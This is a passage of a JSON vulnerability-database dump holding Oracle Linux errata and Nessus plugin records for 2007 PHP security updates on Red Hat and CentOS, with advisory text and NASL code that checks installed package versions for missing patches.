(!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0082\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "25317", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "scheme": null}

{"oraclelinux": [{"lastseen": "2019-05-29T18:39:32", "bulletinFamily": "unix", "description": " [4.3.9-3.22.3]\n \n - add security fix for CVE-2007-0988\n \n [4.3.9-3.22.2]\n \n - add security fixes for CVE-2007-0906, CVE-2007-0907,\n CVE-2007-0908, CVE-2007-0909, CVE-2007-0910\n \n [4.3.9-3.22.1]\n \n - update oci8 build from upstream (Bastien Nocera, #162241)\n - add conditionally patch for lib64 oci8 build (Xixi D'Moon, #173964) ", "modified": "2007-02-19T00:00:00", "published": "2007-02-19T00:00:00", "id": "ELSA-2007-0076", "href": "http://linux.oracle.com/errata/ELSA-2007-0076.html", "title": "Important: php security update ", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "unix", "description": " [5.1.6-12.el5]\n - add security fix for CVE-2007-1864, SOAP redirect handling issue,\n FTP CRLF injection issue (#235016)\n \n [5.1.6-11.el5]\n - add security fix for CVE-2007-1718 (#235016)\n \n [5.1.6-9.el5]\n - add security fix for CVE-2007-1583 (#235016)\n - add security fixes for CVE-2007-0455, CVE-2007-1001 (#235036)\n \n [5.1.6-7.el5]\n - add security fix for CVE-2007-1285 (#231597)\n \n [5.1.6-6.el5]\n - add security fixes for: CVE-2007-0906, CVE-2007-0907,\n CVE-2007-0908, CVE-2007-0909, CVE-2007-0910, CVE-2007-0988 (#229013) ", "modified": "2007-06-26T00:00:00", "published": "2007-06-26T00:00:00", "id": "ELSA-2007-0348", "href": "http://linux.oracle.com/errata/ELSA-2007-0348.html", "title": "Important: php security update ", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-02-21T01:09:46", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension, the str_replace() function, and the imap_mail_compose() function. If very long strings under the control of an attacker are passed to the str_replace() function then an integer overflow could occur in memory allocation. If a script uses the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker who is able to access a PHP application affected by any these issues could trigger these flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nIf unserializing untrusted data on 64-bit platforms, the zend_hash_init() function can be forced to enter an infinite loop, consuming CPU resources for a limited length of time, until the script timeout alarm aborts execution of the script. (CVE-2007-0988)\n\nIf the wddx extension is used to import WDDX data from an untrusted source, certain WDDX input packets may allow a random portion of heap memory to be exposed. (CVE-2007-0908)\n\nIf the odbc_result_all() function is used to display data from a database, and the contents of the database table are under the control of an attacker, a format string vulnerability is possible which could lead to the execution of arbitrary code. (CVE-2007-0909)\n\nA one byte memory read will always occur before the beginning of a buffer, which could be triggered for example by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allows attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.\n\nRed Hat would like to thank Stefan Esser for his help diagnosing these issues.", "modified": "2018-11-16T00:00:00", "id": "REDHAT-RHSA-2007-0076.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24677", "published": "2007-02-21T00:00:00", "title": "RHEL 3 / 4 : php (RHSA-2007:0076)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0076. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24677);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496);\n script_xref(name:\"RHSA\", value:\"2007:0076\");\n\n script_name(english:\"RHEL 3 / 4 : php (RHSA-2007:0076)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension, the str_replace() function, and the imap_mail_compose()\nfunction. If very long strings under the control of an attacker are\npassed to the str_replace() function then an integer overflow could\noccur in memory allocation. If a script uses the imap_mail_compose()\nfunction to create a new MIME message based on an input body from an\nuntrusted source, it could result in a heap overflow. An attacker who\nis able to access a PHP application affected by any these issues could\ntrigger these flaws and possibly execute arbitrary code as the\n'apache' user. (CVE-2007-0906)\n\nIf unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function can be forced to enter an infinite loop,\nconsuming CPU resources for a limited length of time, until the script\ntimeout alarm aborts execution of the script. (CVE-2007-0988)\n\nIf the wddx extension is used to import WDDX data from an untrusted\nsource, certain WDDX input packets may allow a random portion of heap\nmemory to be exposed. (CVE-2007-0908)\n\nIf the odbc_result_all() function is used to display data from a\ndatabase, and the contents of the database table are under the control\nof an attacker, a format string vulnerability is possible which could\nlead to the execution of arbitrary code. (CVE-2007-0909)\n\nA one byte memory read will always occur before the beginning of a\nbuffer, which could be triggered for example by any use of the\nheader() function in a script. However it is unlikely that this would\nhave any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allows attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\n\nRed Hat would like to thank Stefan Esser for his help diagnosing these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0076\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0076\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"php-4.3.2-39.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-devel-4.3.2-39.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-imap-4.3.2-39.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-ldap-4.3.2-39.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-mysql-4.3.2-39.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-odbc-4.3.2-39.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-pgsql-4.3.2-39.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mbstring-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.22.3\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-xmlrpc-4.3.9-3.22.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:45", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension, the str_replace() function, and the imap_mail_compose() function. If very long strings under the control of an attacker are passed to the str_replace() function then an integer overflow could occur in memory allocation. If a script uses the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker who is able to access a PHP application affected by any these issues could trigger these flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nIf unserializing untrusted data on 64-bit platforms, the zend_hash_init() function can be forced to enter an infinite loop, consuming CPU resources for a limited length of time, until the script timeout alarm aborts execution of the script. (CVE-2007-0988)\n\nIf the wddx extension is used to import WDDX data from an untrusted source, certain WDDX input packets may allow a random portion of heap memory to be exposed. (CVE-2007-0908)\n\nIf the odbc_result_all() function is used to display data from a database, and the contents of the database table are under the control of an attacker, a format string vulnerability is possible which could lead to the execution of arbitrary code. (CVE-2007-0909)\n\nA one byte memory read will always occur before the beginning of a buffer, which could be triggered for example by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allows attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.\n\nRed Hat would like to thank Stefan Esser for his help diagnosing these issues.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2007-0076.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24673", "published": "2007-02-21T00:00:00", "title": "CentOS 3 / 4 : php (CESA-2007:0076)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0076 and \n# CentOS Errata and Security Advisory 2007:0076 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24673);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496);\n script_xref(name:\"RHSA\", value:\"2007:0076\");\n\n script_name(english:\"CentOS 3 / 4 : php (CESA-2007:0076)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension, the str_replace() function, and the imap_mail_compose()\nfunction. If very long strings under the control of an attacker are\npassed to the str_replace() function then an integer overflow could\noccur in memory allocation. If a script uses the imap_mail_compose()\nfunction to create a new MIME message based on an input body from an\nuntrusted source, it could result in a heap overflow. An attacker who\nis able to access a PHP application affected by any these issues could\ntrigger these flaws and possibly execute arbitrary code as the\n'apache' user. (CVE-2007-0906)\n\nIf unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function can be forced to enter an infinite loop,\nconsuming CPU resources for a limited length of time, until the script\ntimeout alarm aborts execution of the script. (CVE-2007-0988)\n\nIf the wddx extension is used to import WDDX data from an untrusted\nsource, certain WDDX input packets may allow a random portion of heap\nmemory to be exposed. (CVE-2007-0908)\n\nIf the odbc_result_all() function is used to display data from a\ndatabase, and the contents of the database table are under the control\nof an attacker, a format string vulnerability is possible which could\nlead to the execution of arbitrary code. (CVE-2007-0909)\n\nA one byte memory read will always occur before the beginning of a\nbuffer, which could be triggered for example by any use of the\nheader() function in a script. However it is unlikely that this would\nhave any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allows attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\n\nRed Hat would like to thank Stefan Esser for his help diagnosing these\nissues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-February/013543.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3940e92c\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-February/013544.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8b50cef\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-February/013545.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e5afc62e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-February/013546.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?43c21194\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-February/013558.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?187f0d51\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2007-February/013559.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d8af9a87\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n 